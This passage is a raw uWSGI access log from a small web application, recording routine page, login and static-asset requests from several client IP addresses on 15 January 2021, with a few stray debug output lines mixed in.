2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4235] 219.228.146.176 () {42 vars in 859 bytes} [Fri Jan 15 01:34:26 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4236] 219.228.146.176 () {42 vars in 850 bytes} [Fri Jan 15 01:34:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4237] 219.228.146.176 () {42 vars in 848 bytes} [Fri Jan 15 01:34:26 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4238] 219.228.146.176 () {42 vars in 855 bytes} [Fri Jan 15 01:34:26 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4239] 219.228.146.176 () {42 vars in 853 bytes} [Fri Jan 15 01:34:26 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4240] 219.228.146.176 () {42 vars in 896 bytes} [Fri Jan 15 01:34:26 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4241] 219.228.146.176 () {42 vars in 834 bytes} [Fri Jan 15 01:34:26 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4242] 219.228.146.176 () {42 vars in 832 bytes} [Fri Jan 15 01:34:26 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4243] 219.228.146.176 () {42 vars in 892 bytes} [Fri Jan 15 01:34:26 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4244] 219.228.146.176 () {42 vars in 880 bytes} [Fri Jan 15 01:34:26 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4245] 219.228.146.176 () {42 vars in 886 bytes} [Fri Jan 15 01:34:26 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2945/4246] 223.104.213.30 () {38 vars in 755 bytes} [Fri Jan 15 01:34:34 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2946/4247] 223.104.213.30 () {38 vars in 755 bytes} [Fri Jan 15 01:34:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2947/4248] 180.160.63.35 () {38 vars in 828 bytes} [Fri Jan 15 01:35:11 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4249] 180.160.63.35 () {40 vars in 839 bytes} [Fri Jan 15 01:35:11 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4250] 180.160.63.35 () {40 vars in 822 bytes} [Fri Jan 15 01:35:11 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4251] 180.160.63.35 () {40 vars in 818 bytes} [Fri Jan 15 01:35:11 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4252] 180.160.63.35 () {40 vars in 826 bytes} [Fri Jan 15 01:35:11 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4253] 180.160.63.35 () {40 vars in 820 bytes} [Fri Jan 15 01:35:11 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4254] 180.160.63.35 () {40 vars in 799 bytes} [Fri Jan 15 01:35:11 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4255] 180.160.63.35 () {40 vars in 801 bytes} [Fri Jan 15 01:35:11 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4256] 180.160.63.35 () {40 vars in 807 bytes} [Fri Jan 15 01:35:11 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4257] 180.160.63.35 () {40 vars in 817 bytes} [Fri Jan 15 01:35:11 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4258] 180.160.63.35 () {40 vars in 815 bytes} [Fri Jan 15 01:35:11 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2948/4259] 219.228.146.176 () {42 vars in 842 bytes} [Fri Jan 15 01:35:12 2021] GET /home/ => generated 11127 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4260] 219.228.146.176 () {42 vars in 834 bytes} [Fri Jan 15 01:35:12 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4261] 219.228.146.176 () {42 vars in 853 bytes} [Fri Jan 15 01:35:12 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4262] 219.228.146.176 () {42 vars in 892 bytes} [Fri Jan 15 01:35:12 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4263] 219.228.146.176 () {42 vars in 859 bytes} [Fri Jan 15 01:35:12 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4264] 219.228.146.176 () {42 vars in 832 bytes} [Fri Jan 15 01:35:12 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4265] 219.228.146.176 () {42 vars in 873 bytes} [Fri Jan 15 01:35:12 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4266] 219.228.146.176 () {42 vars in 850 bytes} [Fri Jan 15 01:35:12 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4267] 219.228.146.176 () {42 vars in 890 bytes} [Fri Jan 15 01:35:12 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4268] 219.228.146.176 () {42 vars in 840 bytes} [Fri Jan 15 01:35:12 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4269] 219.228.146.176 () {42 vars in 851 bytes} [Fri Jan 15 01:35:12 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4270] 219.228.146.176 () {42 vars in 896 bytes} [Fri Jan 15 01:35:12 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4271] 219.228.146.176 () {42 vars in 855 bytes} [Fri Jan 15 01:35:12 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4272] 219.228.146.176 () {42 vars in 848 bytes} [Fri Jan 15 01:35:12 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4273] 219.228.146.176 () {42 vars in 880 bytes} [Fri Jan 15 01:35:12 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4274] 219.228.146.176 () {42 vars in 886 bytes} [Fri Jan 15 01:35:12 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2949/4275] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:35:17 2021] GET /all-0-0-0 => generated 13893 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2950/4276] 219.228.146.176 () {40 vars in 817 bytes} [Fri Jan 15 01:35:33 2021] GET /single/6 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2951/4277] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:35:33 2021] GET /single/6/ => generated 9446 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2952/4278] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:35:37 2021] GET /all-0-0-0 => generated 13893 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4279] 180.160.63.35 () {40 vars in 872 bytes} [Fri Jan 15 01:36:04 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2953/4280] 219.228.146.176 () {40 vars in 809 bytes} [Fri Jan 15 01:36:12 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2954/4281] 219.228.146.176 () {40 vars in 811 bytes} [Fri Jan 15 01:36:12 2021] GET /home/ => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2955/4282] 180.160.63.35 () {48 vars in 962 bytes} [Fri Jan 15 01:36:14 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2956/4283] 180.160.63.35 () {40 vars in 877 bytes} [Fri Jan 15 01:36:15 2021] GET /home/ => generated 11128 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4284] 180.160.63.35 () {40 vars in 816 bytes} [Fri Jan 15 01:36:15 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4285] 180.160.63.35 () {40 vars in 814 bytes} [Fri Jan 15 01:36:15 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4286] 180.160.63.35 () {40 vars in 865 bytes} [Fri Jan 15 01:36:15 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4287] 180.160.63.35 () {40 vars in 859 bytes} [Fri Jan 15 01:36:15 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4288] 180.160.63.35 () {40 vars in 861 bytes} [Fri Jan 15 01:36:15 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2957/4289] 219.228.146.176 () {40 vars in 829 bytes} [Fri Jan 15 01:36:19 2021] GET /home/single.html => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2958/4290] 219.228.146.176 () {40 vars in 840 bytes} [Fri Jan 15 01:36:22 2021] GET /home/single.html => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4291] 180.160.63.35 () {40 vars in 878 bytes} [Fri Jan 15 01:36:24 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2959/4292] 219.228.146.176 () {40 vars in 824 bytes} [Fri Jan 15 01:36:24 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2960/4293] 219.228.146.176 () {40 vars in 826 bytes} [Fri Jan 15 01:36:24 2021] GET /single/2/ => generated 9563 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2961/4294] 180.160.63.35 () {40 vars in 884 bytes} [Fri Jan 15 01:36:28 2021] GET /all-0-0-0 => generated 13894 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4295] 180.160.63.35 () {40 vars in 818 bytes} [Fri Jan 15 01:36:28 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4296] 180.160.63.35 () {40 vars in 816 bytes} [Fri Jan 15 01:36:28 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4297] 180.160.63.35 () {40 vars in 862 bytes} [Fri Jan 15 01:36:28 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4298] 180.160.63.35 () {40 vars in 894 bytes} [Fri Jan 15 01:36:28 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4299] 180.160.63.35 () {38 vars in 809 bytes} [Fri Jan 15 01:36:28 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4300] 180.160.63.35 () {38 vars in 839 bytes} [Fri Jan 15 01:36:28 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 16999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2962/4301] 180.160.63.35 () {40 vars in 889 bytes} [Fri Jan 15 01:36:32 2021] GET /single/18 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2963/4302] 180.160.63.35 () {40 vars in 891 bytes} [Fri Jan 15 01:36:32 2021] GET /single/18/ => generated 9399 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2964/4303] 219.228.146.176 () {40 vars in 840 bytes} [Fri Jan 15 01:37:03 2021] GET /home/single.html => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2965/4304] 180.160.63.35 () {40 vars in 887 bytes} [Fri Jan 15 01:37:03 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2966/4305] 180.160.63.35 () {40 vars in 889 bytes} [Fri Jan 15 01:37:03 2021] GET /single/1/ => generated 9463 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2967/4306] 219.228.146.176 () {42 vars in 871 bytes} [Fri Jan 15 01:37:06 2021] GET /home/single.html => generated 11127 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4307] 219.228.146.176 () {42 vars in 864 bytes} [Fri Jan 15 01:37:06 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4308] 219.228.146.176 () {42 vars in 862 bytes} [Fri Jan 15 01:37:06 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4309] 219.228.146.176 () {42 vars in 859 bytes} [Fri Jan 15 01:37:06 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4310] 219.228.146.176 () {42 vars in 843 bytes} [Fri Jan 15 01:37:06 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4311] 219.228.146.176 () {42 vars in 861 bytes} [Fri Jan 15 01:37:06 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4312] 219.228.146.176 () {42 vars in 866 bytes} [Fri Jan 15 01:37:06 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4313] 219.228.146.176 () {42 vars in 884 bytes} [Fri Jan 15 01:37:06 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4314] 219.228.146.176 () {42 vars in 851 bytes} [Fri Jan 15 01:37:06 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4315] 219.228.146.176 () {42 vars in 845 bytes} [Fri Jan 15 01:37:06 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4316] 219.228.146.176 () {42 vars in 903 bytes} [Fri Jan 15 01:37:06 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4317] 219.228.146.176 () {42 vars in 901 bytes} [Fri Jan 15 01:37:06 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4318] 219.228.146.176 () {42 vars in 907 bytes} [Fri Jan 15 01:37:06 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4319] 219.228.146.176 () {42 vars in 870 bytes} [Fri Jan 15 01:37:06 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4320] 219.228.146.176 () {42 vars in 891 bytes} [Fri Jan 15 01:37:06 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4321] 219.228.146.176 () {42 vars in 897 bytes} [Fri Jan 15 01:37:06 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2968/4322] 219.228.146.176 () {40 vars in 826 bytes} [Fri Jan 15 01:37:10 2021] GET /all-0-0-0 => generated 13893 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4323] 219.228.146.176 () {40 vars in 893 bytes} [Fri Jan 15 01:37:10 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2969/4324] 180.160.63.35 () {40 vars in 889 bytes} [Fri Jan 15 01:37:15 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2970/4325] 180.160.63.35 () {40 vars in 891 bytes} [Fri Jan 15 01:37:15 2021] GET /single/16/ => generated 9424 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 25874|app: 0|req: 2971/4326] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:37:18 2021] GET /all-8-0-0 => generated 10260 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 25874|app: 0|req: 2972/4327] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:37:22 2021] GET /all-5-0-0 => generated 10675 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 25874|app: 0|req: 2973/4328] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:37:23 2021] GET /all-4-0-0 => generated 10239 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 25874|app: 0|req: 2974/4329] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:37:26 2021] GET /all-9-0-0 => generated 10264 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2975/4330] 180.160.63.35 () {48 vars in 1071 bytes} [Fri Jan 15 01:37:41 2021] POST /single/16/ => generated 0 bytes in 26 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2976/4331] 180.160.63.35 () {42 vars in 921 bytes} [Fri Jan 15 01:37:41 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2977/4332] 180.160.63.35 () {42 vars in 923 bytes} [Fri Jan 15 01:37:41 2021] GET /single/16/ => generated 9959 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2978/4333] 180.160.63.35 () {40 vars in 891 bytes} [Fri Jan 15 01:37:54 2021] GET /single/16/ => generated 9959 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2979/4334] 180.160.63.35 () {42 vars in 916 bytes} [Fri Jan 15 01:38:04 2021] GET /all-0-0-0 => generated 13894 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4335] 180.160.63.35 () {42 vars in 848 bytes} [Fri Jan 15 01:38:04 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2980/4336] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:38:29 2021] GET /all-0-0-0 => generated 13893 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2981/4337] 219.228.146.176 () {40 vars in 833 bytes} [Fri Jan 15 01:38:35 2021] GET /ownpublish-0-0-0 => generated 10085 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2982/4338] 219.228.146.176 () {40 vars in 816 bytes} [Fri Jan 15 01:38:37 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2983/4339] 219.228.146.176 () {40 vars in 818 bytes} [Fri Jan 15 01:38:37 2021] GET /home/ => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2984/4340] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:38:44 2021] GET /all-0-0-0 => generated 13893 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2985/4341] 219.228.146.160 () {36 vars in 669 bytes} [Fri Jan 15 01:38:48 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2986/4342] 219.228.146.160 () {36 vars in 671 bytes} [Fri Jan 15 01:38:49 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2987/4343] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:38:50 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2988/4344] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 01:38:50 2021] GET /single/16/ => generated 9957 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2989/4345] 219.228.146.160 () {38 vars in 760 bytes} [Fri Jan 15 01:38:50 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4346] 219.228.146.160 () {38 vars in 766 bytes} [Fri Jan 15 01:38:50 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4347] 219.228.146.160 () {38 vars in 768 bytes} [Fri Jan 15 01:38:50 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4348] 219.228.146.160 () {38 vars in 770 bytes} [Fri Jan 15 01:38:50 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4349] 219.228.146.160 () {38 vars in 788 bytes} [Fri Jan 15 01:38:50 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4350] 219.228.146.160 () {38 vars in 749 bytes} [Fri Jan 